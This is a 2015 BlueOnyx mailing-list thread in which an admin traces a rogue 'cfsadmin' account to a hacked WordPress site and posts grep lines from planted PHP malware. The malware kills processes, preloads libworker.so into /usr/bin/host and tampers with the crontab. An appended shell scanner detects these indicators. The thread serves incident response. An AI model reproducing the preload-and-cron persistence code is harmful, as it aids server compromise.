[BlueOnyx:17917] Re: 5106R cfsadmin load issue

Gerald Waugh gwaugh at frontstreetnetworks.com
Sat Jun 27 12:13:42 -05 2015


OK here is the hack
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@system("killall -9 ".basename("*/usr/bin/host*"));
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$f = fopen("/usr/bin/host", "rb");
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$HBN=basename("*/usr/bin/host*");
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");

On Sat, Jun 27, 2015 at 11:21 AM, Gerald Waugh <
gwaugh at frontstreetnetworks.com> wrote:

>
> On 06/27/2015 10:51 AM, Michael Stauber wrote:
>
>> Hi Gerald,
>>
>>  caching file system admin ???
>>>
>> That's not a standard component of any BlueOnyx version and it's also
>> not in the 5106R or CentOS5 yum repositories.
>>
>> Find out where the binary for that is located:
>>
>> which cfsadmin
>>
>> Or use "find" for that if "which" doesn't find it.
>>
>> Then check which RPM that binary came from:
>>
>> rpm -q --whatprovides <path-of-binary>
>>
>> That tells you the name of the RPM that it came from. If any.
>>
>> If you get an RPM name, you can run "yum info <rpm-name>" on it to see
>> what info the system has about that RPM.
>>
> Not running now so which showed no results
> But found this with locate
>
> /home/.sites/137/site42/.users/26/cfsadmin
> /home/.sites/137/site42/.users/26/cfsadmin/.bash_logout
> /home/.sites/137/site42/.users/26/cfsadmin/.bash_profile
> /home/.sites/137/site42/.users/26/cfsadmin/.bashrc
> /home/.sites/137/site42/.users/26/cfsadmin/.gnome2
> /home/.sites/137/site42/.users/26/cfsadmin/Network Trash Folder
> /home/.sites/137/site42/.users/26/cfsadmin/Private
> /home/.sites/137/site42/.users/26/cfsadmin/dead.letter
> /home/.sites/137/site42/.users/26/cfsadmin/mbox
> /home/.sites/137/site42/.users/26/cfsadmin/web
> /home/.sites/137/site42/users/cfsadmin


-- 
Gerald Waugh
www.frontstreetnetworks.com
(318) 734-4779
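
Added example, not part of the original post or of BlueOnyx: a small shell scan that looks through a web root for PHP files carrying the strings visible in the grep output above, and for the helper files that code writes beside itself. The indicator list, the two-hit threshold, the output format and the function names are assumptions made for this sketch; the sample tree is constructed and contains only inert text.

```shell
#!/bin/sh
# scan_webroot DIR
#   Prints "hits=N dir=images|other PATH" for each PHP file that contains at
#   least two of the strings seen in the post, and "artifact PATH" for any
#   libworker.so or 1.sh file found under DIR.
scan_webroot() {
    find "$1" -type f -name '*.php' | while IFS= read -r f; do
        hits=0
        # Indicator strings copied from the grep output in the post.
        for ind in 'LD_PRELOAD' 'libworker.so' 'killall -9' 'crontab -l'; do
            if grep -qF -- "$ind" "$f"; then hits=$((hits + 1)); fi
        done
        # The file in the post sat under wp-includes/images/, so note PHP
        # files that live in an images directory.
        case $f in */images/*) where=images ;; *) where=other ;; esac
        if [ "$hits" -ge 2 ]; then
            printf 'hits=%s dir=%s %s\n' "$hits" "$where" "$f"
        fi
    done
    # Files the PHP code in the post expects or writes in its own directory.
    find "$1" -type f \( -name 'libworker.so' -o -name '1.sh' \) |
        sed 's/^/artifact /'
}

# make_sample DIR: build a constructed test tree (inert text, not real code).
make_sample() {
    mkdir -p "$1/wp-includes/images/crystal"
    printf '%s\n' \
        '<?php /* killall -9 host; LD_PRELOAD=./libworker.so; crontab -l */' \
        > "$1/wp-includes/images/crystal/system.php"
    # Benign file that mentions only one indicator; must not be reported.
    printf '%s\n' '<?php /* docs: run crontab -l to list jobs */ echo "ok";' \
        > "$1/wp-includes/functions.php"
    : > "$1/wp-includes/images/crystal/libworker.so"
}

# Stand-alone run against the constructed tree.
sample=$(mktemp -d)
make_sample "$sample"
scan_webroot "$sample"
rm -rf "$sample"
```

On a real server the argument would be a site's web directory, such as the /home/.sites/137/site42/web path shown in the post.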